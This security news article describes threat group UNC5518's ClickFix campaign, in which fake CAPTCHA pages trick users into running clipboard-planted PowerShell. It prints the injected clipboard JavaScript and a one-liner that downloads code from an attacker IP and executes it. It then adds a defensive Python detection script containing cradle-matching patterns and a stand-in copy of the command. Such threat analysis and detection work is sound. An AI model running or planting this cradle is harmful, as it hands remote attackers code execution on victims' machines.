UNC5518 Group Hacks Legitimate Websites to Inject Fake Captcha That Tricks Users to Execute Malware


A sophisticated cybercrime operation has emerged, targeting unsuspecting internet users through a deceptive social engineering technique that exploits one of the web’s most trusted security mechanisms.

Since June 2024, the financially motivated threat group UNC5518 has been systematically compromising legitimate websites to inject malicious fake CAPTCHA verification pages, tricking visitors into unknowingly executing malware on their systems.

The attack campaign, dubbed “ClickFix” by security researchers, represents a particularly insidious form of social engineering that leverages users’ familiarity with routine CAPTCHA challenges. When victims encounter these fraudulent verification pages, they are presented with what appears to be a standard reCAPTCHA interface, complete with the familiar “I’m not a robot” checkbox and Google branding.


However, clicking on this seemingly innocuous element triggers a malicious JavaScript payload that automatically copies a PowerShell command to the user’s clipboard.

Google Cloud analysts identified that UNC5518 operates as an access-as-a-service provider, partnering with multiple affiliate threat groups to monetize their initial compromise capabilities.

The group’s sophisticated infrastructure supports various downstream actors, including UNC5774, which specializes in deploying the CORNFLAKE.V3 backdoor, and UNC4108, known for utilizing PowerShell-based tools and conducting extensive network reconnaissance.

Attack lifecycle (Source – Google Cloud)

The technical execution of this attack demonstrates remarkable attention to detail in mimicking legitimate web security practices.

The malicious JavaScript embedded within compromised websites creates a convincing CAPTCHA interface using code that closely resembles authentic Google reCAPTCHA implementations.

When victims click the fake checkbox, the following handler runs silently in the background (the domain in execCommand is defanged as in the original report; the closing brace of the handler was missing from the excerpt and is restored here):

document.getElementById("j").onclick = function(){
    // _0xC holds the PowerShell one-liner shown below
    var ta = document.createElement("textarea");
    ta.value = _0xC;
    document.body.appendChild(ta);
    ta.select();
    // legacy clipboard API; succeeds because it runs inside a user click
    document[.]execCommand("copy");
};

The script places a crafted PowerShell one-liner on the victim’s clipboard:

powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)%0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"

Read piece by piece: -w h runs PowerShell with a hidden window; $u is the current Unix time in seconds (the modulus by 0xfffffffffffffff0 leaves any realistic timestamp unchanged, so the value is effectively a per-second cache-buster); irm (Invoke-RestMethod) fetches the content at that path from the attacker-controlled host; and the pipe into iex (Invoke-Expression) executes whatever comes back. The response is the next-stage loader. Because the path changes every second, the URL is useless as a blocking indicator; the host and port are what to block.

Infection Mechanism and Payload Delivery

The ClickFix technique exploits a critical weakness in user behavior patterns, capitalizing on the widespread acceptance and trust associated with CAPTCHA systems.

Once the malicious PowerShell command is copied to the clipboard, victims are typically instructed through on-screen prompts to paste and execute the command using the Windows Run dialog (Windows+R), believing they are completing a legitimate verification process.
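The two artifacts a responder can hunt for are the process-creation event (PowerShell spawned by explorer.exe, which is what the Run dialog launches through) and the Run dialog history itself, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following is an added example, not code from Google Cloud or from the campaign: it scores command lines against the indicators in the one-liner above and parses RunMRU-style values. The sample events, the RunMRU values, the scoring weights and threshold, and the 203.0.113.10 host standing in for the real C2 are all constructed for this example.

```python
"""Triage helpers for ClickFix-style clipboard-to-Run-dialog execution.

Added example, not code from Google Cloud or from the campaign. The sample
events, RunMRU values and the 203.0.113.10 host are constructed here.
"""
import re
from dataclasses import dataclass, field

# Indicators derived from the one-liner quoted in the article.
POWERSHELL = re.compile(r"(?i)\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b")
HIDDEN_WINDOW = re.compile(r"(?i)\s-w(?:indowstyle)?\s+h(?:idden)?\b")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
    r".*?\|\s*(?:iex|invoke-expression)\b")
IP_LITERAL_URL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?/")
TIME_DERIVED_PATH = re.compile(r"(?i)\[datetime\]::UtcNow.*TotalSeconds")
# The Run dialog hands the command to explorer.exe, which becomes the parent.
RUN_DIALOG_PARENTS = {"explorer.exe"}


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    def suspicious(self) -> bool:
        # Threshold is an assumption: a download cradle plus any one other
        # indicator is enough to page an analyst.
        return self.score >= 3


def score_command(cmdline: str, parent: str = "") -> Verdict:
    """Score one process command line against the ClickFix pattern."""
    v = Verdict()
    if not POWERSHELL.search(cmdline):
        return v
    checks = (
        (HIDDEN_WINDOW, 1, "hidden window (-w h)"),
        (DOWNLOAD_CRADLE, 2, "download piped to Invoke-Expression"),
        (IP_LITERAL_URL, 1, "raw IP address in URL"),
        (TIME_DERIVED_PATH, 1, "URL path derived from current time"),
    )
    for pattern, weight, reason in checks:
        if pattern.search(cmdline):
            v.score += weight
            v.reasons.append(reason)
    if parent.lower() in RUN_DIALOG_PARENTS:
        v.score += 1
        v.reasons.append(f"parent is {parent} (Run dialog)")
    return v


def runmru_commands(values: dict) -> list:
    """Return Run-dialog history, most recent first.

    RunMRU stores one value per entry (a, b, c, ...), each suffixed with a
    literal backslash-1, plus a MRUList value giving the order.
    """
    out = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        out.append(raw[:-2] if raw.endswith("\\1") else raw)
    return out


def triage_events(events: list) -> list:
    """Return (cmdline, verdict) for every suspicious process-creation event."""
    hits = []
    for ev in events:
        v = score_command(ev["cmdline"], ev.get("parent", ""))
        if v.suspicious():
            hits.append((ev["cmdline"], v))
    return hits


# Constructed sample data (not real telemetry). The cradle mirrors the
# article's one-liner with the C2 host replaced by an RFC 5737 address.
CLICKFIX_CMD = (
    'powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]\'1970-1-1\')'
    '.TotalSeconds)%0xfffffffffffffff0;irm 203.0.113.10:8080/$u|iex"'
)
SAMPLE_EVENTS = [
    {"parent": "svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"parent": "explorer.exe", "cmdline": CLICKFIX_CMD},
    {"parent": "cmd.exe", "cmdline": "cmd.exe /c dir"},
]
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1", "b": CLICKFIX_CMD + "\\1"}

if __name__ == "__main__":
    for cmd, v in triage_events(SAMPLE_EVENTS):
        print(f"[score {v.score}] {cmd}\n  " + "; ".join(v.reasons))
    for cmd in runmru_commands(SAMPLE_RUNMRU):
        print("RunMRU:", cmd, score_command(cmd, "explorer.exe").reasons)
```

Feed score_command the command line and parent from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled), and pass RunMRU values exported from the user hive to runmru_commands with the parent fixed to explorer.exe, since that is how the Run dialog launches. The scheduled backup script scores zero and the ClickFix one-liner scores six, so the threshold separates them without relying on the C2 host, which the operators can change.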

Upon execution, the PowerShell script initiates a sophisticated multi-stage infection chain that includes comprehensive anti-analysis measures.

The malware performs environment checks to detect virtual machines and sandboxes, examining system memory configurations and manufacturer information to evade security research environments.

If these checks pass, the script downloads Node.js runtime components from legitimate sources and deploys the CORNFLAKE.V3 backdoor, which establishes persistent access through registry modifications and enables comprehensive system reconnaissance activities including Active Directory enumeration and Kerberoasting credential harvesting techniques.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.